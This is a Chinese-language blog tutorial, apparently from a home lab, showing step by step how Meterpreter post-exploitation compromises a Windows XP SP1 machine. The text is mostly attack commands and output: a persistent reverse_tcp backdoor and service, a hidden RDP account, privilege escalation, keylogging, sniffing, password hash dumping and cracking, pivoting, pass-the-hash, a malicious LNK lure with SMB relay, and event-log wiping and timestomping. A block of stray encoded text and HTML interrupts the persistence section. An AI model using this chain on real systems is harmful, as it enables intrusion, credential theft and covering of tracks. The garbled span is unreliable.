上一篇文章通過BeEF和Metasploit拿到了一台XP SP1的meterpreter會話
本文就進一步通過Meterpreter來蹂躏下這台可憐的XP
文章較長,可利用目錄
=========================================
(1)用payload在被攻擊者機上開一個端口A (2)把命令行終端綁定到A上 (3)攻擊者訪問A,就與被攻擊者機器交互
(1)建一個新進程,容易被偵查 (2)攻擊者和被攻擊者之間的通信是通過端口互發送數據,容易被IDS偵查 (3)被攻擊者可能chroot(change root directory),限權
(1)純內存,所有的需要調用的API都是HOOK (2)16字節一組xor加密,SSL通信封裝傳輸 總之就是不易被發現,什麼平台通用性,可拓展性都是妥妥的。。
background # 讓meterpreter處於後台模式 sessions -i index # 與會話進行交互,index表示第一個session quit # 退出會話 shell # 獲得控制台權限 irb # 開啟ruby終端
cat c:\\boot.ini # 查看文件內容 getwd # 查看當前工作目錄 work directory upload /root/Desktop/netcat.exe c:\\ # 上傳文件到目標機上 download nimeia.txt /root/Desktop/ # 下載文件到本機上 edit c:\\boot.ini # 編輯文件 search -d c:\\windows -f *.mdb # search 文件
ipconfig / ifconfig # 查看網絡接口信息 portfwd add -l 5555 -p 3389 -r 192.168.198.129 # 端口轉發,本機監聽5555,把目標機3389轉到本機5555 root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555 route # 獲取路由表信息
ps # 查看當前活躍進程 migrate pid # 將Meterpreter會話移植到進程數位pid的進程中 execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互 getpid # 獲取當前進程的pid kill pid # 殺死進程 getuid # 查看權限 sysinfo # 查看目標機系統信息,如機器名,操作系統等 shutdown # 關機
AUX輔助模塊 信息搜集 Exploit模塊 滲透攻擊 後滲透模塊 主機控制與拓展攻擊的滲透測試全過程支持
meterpreter > run post/windows/gather/checkvm [*] Checking if EMASTER-8G5WOLV is a Virtual Machine ..... [*] This is a VMware Virtual Machine如果是虛擬機,熱情就下降了。。 也很可能是蜜罐。。
meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443 [*] Persistent agent script is 609628 bytes long [+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs [*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs [+] Agent executed with PID 1888 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp然後它就在目標機的C:/windows/Temp/下建立一個vbs文件,開機會啟動這個文件 上面的vbs的確存在,並且開機啟動也有,但是就是有: vcy087zSyb62q7aro6zJvtfUxvS2r6GjoaMKzqrKssO0bWV0ZXJwcmV0ZXKz9sa3tcS2q873u+HU2nhwz8LV4sO0yN3S17GpwrbE2KO/Cte3sunBy8/Co6xOVFZETcrHd2luIDE20OnE4rv6tcTSu7K/t9ajrMrHd2luIM6qwcvP8s/CvObI3TE2zruzzNDytcTQ6cTiu/qhowq1q8rHu7nKx8zhtb3V4sO0u9jKwqO/CjxzdHJvbmc+1eLA78H0uPa/07DJo6zCt7n9tcS088nxo6zI57n7v7S1vaOsv8nS1Lj4ztK72LTwwvCjvzwvc3Ryb25nPgo8YnI+Cgo8YnI+Cgo8aDI+MymwstewuvPDxbe9t6i2/qO6PC9oMj4KPHByZSBjbGFzcz0="brush:java;">meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter > 監聽:31337 上傳了三個dll文件 然後就在目標機器上多了一個自啟動的服務:Meterpreter。。。
msf exploit(handler) > use exploit/multi/handler msf exploit(handler) > set payload windows/metsvc_bind_tcp payload => windows/metsvc_bind_tcp msf exploit(handler) > set RHOST 192.168.0.111 RHOST => 192.168.0.111 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800 meterpreter >
meterpreter > run getgui -u aa -p 123qwe如果沒出問題的話,應該是添加了用戶aa,密碼為123qwe,並把它加入到那兩個組中。。 然後:
msf exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389連上~ 如果在內網,那麼就先端口轉發:
portfwd add -l 5555 -p 3389 -r 192.168.0.111 # 端口轉發,本機監聽5555,把目標機3389轉到本機5555 root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h Help Banner. -t <opt> The technique to use. (Default to '0'). 0 : All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin) 4 : Exploit - KiTrap0D (In Memory/User) meterpreter >getsystem會用四種方法去提權,(In Memory/Admin) 表示所需環境和初始權限。
meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >system 就是最高權限了。。
meterpreter > background [*] Backgrounding session 5... msf > set session 5 session => 5 msf > use post/windows/escalate/ms10_073_kbdlayout msf post(ms10_073_kbdlayout) > exploit [*] Attempting to elevate PID 0x278 [*] {"GetLastError"=>0, "return"=>1548} [*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom .. [*] Allocated 0x8000 bytes of memory @ 0x60630000 [*] Initialized RWX buffer ... [*] Current Keyboard Layout: 0x8040804 [*] Patched in syscall wrapper @ 0x60631000 [*] Successfully executed syscall wrapper! [*] Attempting to cause the ring0 payload to execute... [*] SendInput: {"GetLastError"=>5, "return"=>1} [*] Post module execution completed msf post(ms10_073_kbdlayout) >
msf post(ms10_073_kbdlayout) > back msf > set session 5 session => 5 msf > use post/windows/escalate/ms10_092_schelevator msf post(ms10_092_schelevator) > exploit [-] Windows XP (Build 2600, Service Pack 1). is not vulnerable. [*] Post module execution completed msf post(ms10_092_schelevator) >哎,我就可恥得只能對XP SP1下手。。這點出息。。
meterpreter > run post/windows/gather/dumplinks [*] Running module against EMASTER-8G5WOLV [*] Running as SYSTEM extracting user list... [*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\... [*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk. [*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk. [*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk. [*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk. [*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk. [*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk. [*] No Recent Office files found for user Administrator. Nothing to do. [*] No Recent directory found for user LocalService. Nothing to do. [*] No Recent Office files found for user LocalService. Nothing to do. [*] No Recent directory found for user NetworkService. Nothing to do. [*] No Recent Office files found for user NetworkService. Nothing to do.
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... dir <Return> cd <Ctrl> <LCtrl> zhuomian1 <Back> <Back> <Back> <Back> 11 <Back> <Back> zhuo <Return> =-1 <Tab> <Return> <CapsLock> dir <Return> <Back> <Back> <Back> <Back> <Ctrl> <LCtrl> dir <CapsLock> <Back> <Back> r <Back> ir <Return> meterpreter > keyscan_dump Dumping captured keystrokes... <Return> <Return> <N5> <N6> <N4> <N5> <N4> <N5> <N9> <N1> <N3> xugyabq <Back> <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl> <LCtrl> s <Back> <Back> <Back> <Back> emaster <Left> -- <Back> <Back> _ <Ctrl> <LCtrl> s meterpreter > keyscan_stop Stopping the keystroke sniffer... meterpreter >
meterpreterun > run post/windows/gather/enum_applications [*] Enumerating applications installed on EMASTER-8G5WOLV Installed Applications ====================== Name Version ---- ------- Adobe Flash Player 11 ActiveX 11.9.900.152 VMware Tools 8.1.4.11056 WebFldrs XP 9.50.6513 Windows Installer 3.1 (KB893803) 3.1 [*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt meterpreter >
meterpreter > use sniffer Loading extension sniffer...success. meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) meterpreter > sniffer_interfaces 1 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) meterpreter > sniffer_start 1 [*] Capture started on interface 1 (50000 packet buffer) meterpreter > sniffer_dump 1 /tmp/xpsp1.cap [*] Flushing packet capture buffer for interface 1... [*] Flushed 355 packets (101378 bytes) [*] Downloaded 100% (101378/101378)... [*] Download completed, converting to PCAP... [*] PCAP file written to /tmp/xpsp1.cap meterpreter > sniffer_stop 1 [*] Capture stopped on interface 1 [*] There are 157 packets (40891 bytes) remaining [*] Download or release them using 'sniffer_dump' or 'sniffer_release' meterpreter >
meterpreter > run post/windows/gather/enum_ie [*] IE Version: 6.0.2800.1106 [-] This module will only extract credentials for >= IE7 [*] Retrieving history..... File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat [*] Retrieving cookies..... File: C:\Documents and Settings\LocalService\Cookies\index.dat [*] Looping through history to find autocomplete data.... [-] No autocomplete entries found in registry [*] Looking in the Credential Store for HTTP Authentication Creds... meterpreter >這裡說IE7以上才有效。。
msf auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml [*] exec: cat /opt/metasploit/config/database.yml # # These settings are for the database used by the Metasploit Framework # unstable tree included in this installer, not the commercial editions. # development: adapter: "postgresql" database: "msf3dev" username: "msf3" password: "4bfedfc2" port: 7337 host: "localhost" pool: 256 timeout: 5 production: adapter: "postgresql" database: "msf3dev" username: "msf3" password: "4bfedfc2" port: 7337 host: "localhost" pool: 256 timeout: 5 msf auxiliary(jtr_crack_fast) > db_connect msf3:[email protected]:7337/msf3dev連接的格式: db_connect 用戶名:密碼@localhost:端口/數據庫名字 這些都放在/opt/metasploit/config/database.yml中
vi /opt/metasploit/msf3/msfconsole change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby in the top of msfconsole.具體為什麼這麼改可參考:解決過程
msf exploit(handler) > use post/windows/gather/hashdump msf post(hashdump) > set session 1 session => 1 msf post(hashdump) > exploit [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881::: [*] Post module execution completed
meterpreter > hashdump Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881::: meterpreter >
在非sysytem權限下無效。。 在win7,vista,win2008不穩定。。 在UAC(User Account Control)下失效。。
meterpreter > run post/windows/gather/smart_hashdump [*] Running module against EMASTER-8G5WOLV [*] Hashes will be saved to the database if one is connected. [*] Hashes will be saved in loot in JtR password file format to: [*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt [*] Dumping password hashes... [*] Running as SYSTEM extracting hashes from registry [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... [+] Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011::: [+] HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb::: [+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881::: meterpreter >
檢查已有權限+系統類型 檢查是否為域控制器 從注冊表讀hash,若失敗,注入LSASS進程;若域控制器,直接注入LSASS進程 若win2008+會話管理員權限,嘗試使用getsystem,若在system不能注入LSASS,先migrate到system權限下的進程,繼續注入LSASS 若win7/Vista+UAC關閉+會話管理員權限,嘗試getsystem,讀取hash 若win2003/xp/2000,直接getsystem,讀取hash
msf auxiliary(jtr_crack_fast) > creds Credentials =========== host port user pass type active? ---- ---- ---- ---- ---- ------- 192.168.0.111 445 guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 smb_hash true 192.168.0.111 445 administrator 123qwe password true 192.168.0.111 445 guest password true 192.168.0.111 445 administrator daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011 smb_hash true 192.168.0.111 445 helpassistant 866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb smb_hash true 192.168.0.111 445 support_388945a0 aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881 smb_hash true [*] Found 6 credentials. msf auxiliary(jtr_crack_fast) >
msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast msf auxiliary(jtr_crack_fast) > exploit [*] Seeded the password database with 6 words... /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) guesses: 1 time: 0:00:00:06 DONE (Sat Dec 7 14:36:28 2013) c/s: 5791K trying: WIT1900 - ZZZ1900 Warning: passwords printed above might be partial and not be all those cracked Use the "--show" option to display all of the cracked passwords reliably [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2]) [*] Output: 123QWE (cred_1) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) Warning: mixed-case charset, but the current hash type is case-insensitive; some candidate passwords may be unnecessarily tried more than once. guesses: 1 time: 0:00:00:08 DONE (Sat Dec 7 14:36:37 2013) c/s: 18967K trying: ||V} - |||} Warning: passwords printed above might be partial and not be all those cracked Use the "--show" option to display all of the cracked passwords reliably [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2]) [*] Output: Remaining 3 password hashes with no different salts [*] Output: (cred_2) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:36:37 2013) c/s: 1234K trying: 89093 - 89092 [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2]) [*] Output: Remaining 2 password hashes with no different salts /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) [*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011::: [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881::: [*] [*] 3 password hashes cracked, 2 left /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) guesses: 1 time: 0:00:00:20 DONE (Sat Dec 7 14:36:58 2013) c/s: 10089K trying: zydeco1900 - 123qwe1900 Use the "--show" option to display all of the cracked passwords reliably [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) [*] Output: 123qwe (cred_1) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) guesses: 1 time: 0:00:00:09 DONE (Sat Dec 7 14:37:07 2013) c/s: 17311K trying: |||} Use the "--show" option to display all of the cracked passwords reliably [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) [*] Output: Remaining 3 password hashes with no different salts [*] Output: (cred_2) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:37:08 2013) c/s: 1388K trying: 89030 - 89092 [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) [*] Output: Remaining 2 password hashes with no different salts /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john) [*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011::: [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] [*] 2 password hashes cracked, 2 left [+] Cracked: administrator:123qwe (192.168.0.111:445) [+] Cracked: guest: (192.168.0.111:445) [*] Auxiliary module execution completed msf auxiliary(jtr_crack_fast) >
meterpreter > run get_local_subnets Local subnet: 192.168.0.0/255.255.255.0 meterpreter > background [*] Backgrounding session 1... msf auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1 [*] Route added msf auxiliary(jtr_crack_fast) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.0.0 255.255.255.0 Session 1 msf auxiliary(jtr_crack_fast) >這樣子msf就成功得在會話1上添加了192.168.0.0/24 這個網段的路由,所有攻擊者對這網段的流量都通過會話1轉發。
msf auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24 RHOST => 192.168.0.0/24 msf auxiliary(jtr_crack_fast) > set PORTS 445 PORTS => 445 msf auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > run莫名的掃不出結果,run後一直靜止。。
msf exploit(psexec) > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 192.168.0.108 LHOST => 192.168.0.108 msf exploit(psexec) > set LPORT 443 LPORT => 443 msf exploit(psexec) > set RHOST 192.168.0.111 RHOST => 192.168.0.111 msf exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011 SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011 msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.0.108:443 [*] Connecting to the server... [*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''... [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) msf exploit(psexec) >
msf post(droplnk) > use exploit/windows/smb/smb_relay msf exploit(smb_relay) > show options Module options (exploit/windows/smb/smb_relay): Name Current Setting Required Description ---- --------------- -------- ----------- SMBHOST no The target SMB server (leave empty for originating system) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 445 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) Exploit target: Id Name -- ---- 0 Automatic msf exploit(smb_relay) > set SRVHOST 192.168.0.108 SRVHOST => 192.168.0.108 msf exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(smb_relay) > set LHOST 192.168.0.108 LHOST => 192.168.0.108 msf exploit(smb_relay) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.108:4444 [*] Server started. msf exploit(smb_relay) >
存在於shell32.dll當中,windows的程序加載快捷方式的圖標。當圖標存在於用戶的DLL中時,構造惡意的LNK文件指向這個DLL。。 系統解析沒做好參數驗證,導致用戶DLL被加載執行。。
msf exploit(psexec) > use post/windows/escalate/droplnk msf post(droplnk) > show options Module options (post/windows/escalate/droplnk): Name Current Setting Required Description ---- --------------- -------- ----------- ICONFILENAME icon.png yes File name on LHOST's share LHOST yes Host listening for incoming SMB/WebDAV traffic LNKFILENAME Words.lnk yes Shortcut's filename SESSION yes The session to run this module on. SHARENAME share1 yes Share name on LHOST msf post(droplnk) > set LHOST 192.168.0.108 LHOST => 192.168.0.108 msf post(droplnk) > set session 1 session => 1 msf post(droplnk) > exploit [*] Creating evil LNK [*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk [*] Done. Wait for evil to happen.. [*] Post module execution completed msf post(droplnk) >
我們把這個C:\Windows\system32\Words.lnk文件復制到內網共享文件夾中。。坐等別人點擊。。 如果有人同事A點擊了,這個lnk文件,就觸發MS10-046漏洞。。那麼A就訪問我們搭建的惡意SMB服務器,這也就觸發了MS08-068漏洞。。 這兩個漏洞合作,讓人一看就掛。。
NT LAN Manager早期SMB協議在網絡上傳輸明文口令。後來出現 LAN Manager Challenge/Response 驗證機制,簡稱LM,它是如此簡單以至很容易就被破解。微軟提出了WindowsNT挑戰/響應驗證機制,稱之為NTLM。 MS08-068是SMB在處理NTLM的一個漏洞。當目標機訪問攻擊者的惡意SMB服務器時,攻擊者延時發送SMB響應,提取目標機上的NTLM的HASH對目標機進行回重放,達到身份認證的目的。。
meterpreter > clearev [*] Wiping 148 records from Application... [*] Wiping 335 records from System... [*] Wiping 0 records from Security... meterpreter >
meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 0 fil 2013-12-07 16:44:55 +0800 1.txt.txt 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt meterpreter > timestomp 1.txt.txt -f nimeia.txt [*] Setting MACE attributes on 1.txt.txt from nimeia.txt meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 0 fil 2013-12-07 12:28:07 +0800 1.txt.txt 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt meterpreter >